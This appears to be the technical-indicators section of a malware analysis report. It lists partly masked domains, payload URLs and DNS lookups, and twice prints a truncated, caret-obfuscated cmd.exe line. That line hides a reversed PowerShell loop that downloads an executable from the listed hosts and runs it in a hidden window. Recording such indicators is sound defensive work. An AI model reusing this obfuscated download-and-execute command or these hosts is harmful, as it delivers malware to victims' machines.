Technical Information
- '<SYSTEM32>\cmd.exe' /V^:^ON/C"^s^et I^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hct^ac^}^;^ka^erb^;^Qj^B$^ ^m^etI-^ekovn^I^;)^QjB$ ^,v^qD^$(^e^l^i^Fd^ao^ln^wo^D.^fQT^$^{yr^t^{)Or^H^$ ni^ vqD^$(^hc^a^er^o^f;'exe.^'+jIa^$...
- 'bu####remedio.com':80
- 'sa###paints.com':80
- 'sa###paints.com':443
- '36##rips.pk':80
- http://bu####remedio.com/t0GvzVYf
- http://sa###paints.com/AMtppDHuZ
- http://36##rips.pk/7wXfDqSc
- 'sa###paints.com':443
- DNS ASK 3m###nhhang.com
- DNS ASK bu####remedio.com
- DNS ASK sa###paints.com
- DNS ASK ti###i.net.vn
- DNS ASK 36##rips.pk
- '<SYSTEM32>\cmd.exe' /V^:^ON/C"^s^et I^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hct^ac^}^;^ka^erb^;^Qj^B$^ ^m^etI-^ekovn^I^;)^QjB$ ^,v^qD^$(^e^l^i^Fd^ao^ln^wo^D.^fQT^$^{yr^t^{)Or^H^$ ni^ vqD^$(^hc^a^er^o^f;'exe.^'+jIa^$...' (with hidden window)